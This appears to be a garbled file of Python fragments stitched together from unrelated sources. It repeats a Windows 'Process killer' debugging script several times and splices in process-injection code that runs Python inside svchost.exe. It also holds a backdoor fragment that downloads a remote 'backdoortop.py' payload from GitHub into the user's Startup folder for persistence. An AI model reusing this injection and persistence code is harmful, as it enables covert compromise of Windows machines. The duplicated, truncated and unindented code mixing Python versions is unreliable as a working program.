except WindowsError, e:
print "Warning: call to OpenProcess() failed: %s" % str(e)
targets = next_targets
# Try to terminate processes by injecting a call to ExitProcess().
next_targets = list()
for pid in targets:
next_targets.append(pid)
try:
process = Process(pid)
process.scan_modules()
try:
module = process.get_module_by_name('kernel32')
pExitProcess = module.resolve('ExitProcess')
try:
process.start_thread(pExitProcess, -1)
next_targets.pop()
count += 1
print "Forced process %d exit" % pid
except WindowsError, e:
print "Warning: call to CreateRemoteThread() failed %d: %s" % (pid, str(e))
except WindowsError, e:
print "Warning: resolving address of ExitProcess() failed %d: %s" % (pid, str(e))
except WindowsError, e:
print "Warning: scanning for loaded modules failed %d: %s" % (pid, str(e))
targets = next_targets
# Attach to every process.
# Print a message on error, but don't stop.
next_targets = list()
for pid in targets:
python_lib = "python{0}{1}.dll".format(sys.version_info.major, sys.version_info.minor)
python_dll = ctypes.util.find_library(python_lib)
s = System()
s.scan_processes()
pl = s.find_processes_by_filename("svchost.exe")
pid = pl[0][0].get_pid()
p = Process(pid)
print('pid', pid)
print('arch', p.get_bits())
t = p.inject_dll(python_dll)
p.scan_modules()
m = p.get_module_by_name(python_lib)
init = m.resolve("Py_InitializeEx")
pyrun = m.resolve("PyRun_SimpleString")
print(init, pyrun)
p.start_thread(init, 0)
time.sleep(0.1)
sh = 'import subprocess; subprocess.call("svchost.exe")'
addr = p.malloc(len(sh))
p.write(addr, sh)
p.start_thread(pyrun, addr)
# Movendo o backdoor pro startup
if dados.startswith("move_startup"):
url = "https://raw.githubusercontent.com/DedSec-F0x/DedSec-Framework/master/exploit/python/backdoortop.py"
user = getpass.getuser()
os.chdir("C:\Users\" + user + "AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\")
u = urllib2.urlopen(url)
f = open(file_name, 'wb')
meta = u.info()
file_size = int(meta.getheaders("Content-Length")[0])
except WindowsError, e:
print "Warning: call to OpenProcess() failed: %s" % str(e)
targets = next_targets
# Try to terminate processes by injecting a call to ExitProcess().
next_targets = list()
for pid in targets:
next_targets.append(pid)
try:
process = Process(pid)
process.scan_modules()
try:
module = process.get_module_by_name('kernel32')
pExitProcess = module.resolve('ExitProcess')
try:
process.start_thread(pExitProcess, -1)
next_targets.pop()
count += 1
print "Forced process %d exit" % pid
except WindowsError, e:
print "Warning: call to CreateRemoteThread() failed %d: %s" % (pid, str(e))
except WindowsError, e:
print "Warning: resolving address of ExitProcess() failed %d: %s" % (pid, str(e))
except WindowsError, e:
print "Warning: scanning for loaded modules failed %d: %s" % (pid, str(e))
targets = next_targets
# Attach to every process.
# Print a message on error, but don't stop.
next_targets = list()
for pid in targets:
def main(argv):
script = os.path.basename(argv[0])
params = argv[1:]
print("Process killer")
print("by Mario Vilas (mvilas at gmail.com)")
print
if len(params) == 0 or '-h' in params or '--help' in params or \
'/?' in params:
print("Usage:")
print(" %s <process ID or name> [process ID or name...]" % script)
print
print(
"If a process name is given instead of an ID all matching processes are killed."
)
exit()
# Scan for active processes.
# This is needed both to translate names to IDs, and to validate the user-supplied IDs.
s = System()
s.request_debug_privileges()
s.scan_processes()
# Parse the command line.
# Each ID is validated against the list of active processes.
# Each name is translated to an ID.
# On error, the program stops before killing any process at all.
targets = set()
for token in params:
try:
pid = HexInput.integer(token)
except ValueError:
pid = None
if pid is None:
matched = s.find_processes_by_filename(token)
if not matched:
print("Error: process not found: %s" % token)
exit()
for (process, name) in matched:
targets.add(process.get_pid())
else:
if not s.has_process(pid):
print("Error: process not found: 0x%x (%d)" % (pid, pid))
exit()
targets.add(pid)
targets = list(targets)
targets.sort()
count = 0
# Try to terminate the processes using the TerminateProcess() API.
next_targets = list()
for pid in targets:
next_targets.append(pid)
try:
# Note we don't really need to call open_handle and close_handle,
# but it's good to know exactly which API call it was that failed.
process = Process(pid)
process.open_handle()
try:
process.kill(-1)
next_targets.pop()
count += 1
print("Terminated process %d" % pid)
try:
process.close_handle()
except WindowsError as e:
print("Warning: call to CloseHandle() failed: %s" % str(e))
except WindowsError as e:
print("Warning: call to TerminateProcess() failed: %s" %
str(e))
except WindowsError as e:
print("Warning: call to OpenProcess() failed: %s" % str(e))
targets = next_targets
# Try to terminate processes by injecting a call to ExitProcess().
next_targets = list()
for pid in targets:
next_targets.append(pid)
try:
process = Process(pid)
process.scan_modules()
try:
module = process.get_module_by_name('kernel32')
pExitProcess = module.resolve('ExitProcess')
try:
process.start_thread(pExitProcess, -1)
next_targets.pop()
count += 1
print("Forced process %d exit" % pid)
except WindowsError as e:
print(
"Warning: call to CreateRemoteThread() failed %d: %s" %
(pid, str(e)))
except WindowsError as e:
print(
"Warning: resolving address of ExitProcess() failed %d: %s"
% (pid, str(e)))
except WindowsError as e:
print("Warning: scanning for loaded modules failed %d: %s" %
(pid, str(e)))
targets = next_targets
# Attach to every process.
# print(a message on error, but don't stop.)
next_targets = list()
for pid in targets:
try:
win32.DebugActiveProcess(pid)
count += 1
print("Attached to process %d" % pid)
except WindowsError as e:
next_targets.append(pid)
print("Warning: error attaching to %d: %s" % (pid, str(e)))
targets = next_targets
# Try to call the DebugSetProcessKillOnExit() API.
#
# Since it's defined only for Windows XP and above,
# on earlier versions we just ignore the error,
# since the default behavior on those platforms is
# already what we wanted.
#
# This must be done after attaching to at least one process.
#
# http://msdn.microsoft.com/en-us/library/ms679307(VS.85).aspx
try:
win32.DebugSetProcessKillOnExit(True)
except AttributeError:
pass
except WindowsError as e:
print("Warning: call to DebugSetProcessKillOnExit() failed: %s" %
str(e))
if count == 0:
print("Failed! No process was killed.")
elif count == 1:
print("Successfully killed 1 process.")
else:
print("Successfully killed %d processes." % count)
# Exit the current thread.
# This will kill all the processes we have attached to.
exit()
